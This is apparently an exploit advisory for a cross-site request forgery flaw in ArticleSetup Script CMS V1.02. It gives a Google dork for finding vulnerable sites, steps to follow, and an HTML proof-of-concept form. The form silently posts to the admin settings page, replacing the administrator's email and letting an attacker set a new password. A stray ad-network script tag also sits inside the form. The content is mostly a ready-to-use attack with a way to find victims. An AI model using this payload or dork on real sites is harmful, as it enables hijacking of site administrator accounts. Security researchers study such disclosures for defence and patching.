====================================================================================================================================
| # Title     : ArticleSetup Script cms V1.02 CSRF Vulnerability                                                                   |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro)                                                                                        |
| # Vendor    : http://articlesynergy.com/                                                                                         |  
| # Dork      : intext:"© 2011 - Article Setup"                                                                                    |
====================================================================================================================================


poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code Update admin informations .

[+] Go to the line 6.

[+] Set the target site link Save changes and apply . 

[+] infected file : /admin/adminsettings.php . 

[+] http://127.0.0.1/q7art/admin/adminsettings.php

[+] save code as poc.html .


<h2>Update Your Admin Settings</h2>
					<div class="block">
	
			
			<p style="padding-left: 15px; color: red;">Settings updated!</p>
	<form style="padding-left: 15px;" name="submission" enctype="multipart/form-data" method="POST" action="http://127.0.0.1/articles3nichesiteorg/admin/adminsettings.php">

	<b>Name:</b><br>
	<input name="name" style="width: 250px;" value="Administrator" type="text">
	
	<b>Email:</b><br>
	<input name="email" style="width: 250px;" value="indoushka4ever@gmail.com" type="text">
	
	<b>New Password:</b><br>
	<p>(Leave the password fields blank to retain old password)</p>
	<input name="pass1" style="width: 250px;" type="password">

	<b>New Password (again):</b><br>
	<input name="pass2" style="width: 250px;" type="password">

	
	<div style="clear:both"></div>


	<input name="update" id="update" type="hidden">
	<button type="submit" id="submitstyle" name="save" class="button_colour round_all"><img alt="Bended Arrow Right" src="http://articles3.nichesite.org/admin/images/icons/small/white/Bended Arrow Right.png" width="24" height="24"><span>Update Settings</span></button>
<script data-ad-client="ca-pub-9756159400559709" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
</form>

====Greetings to :=========================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |
===========================================================================================================================================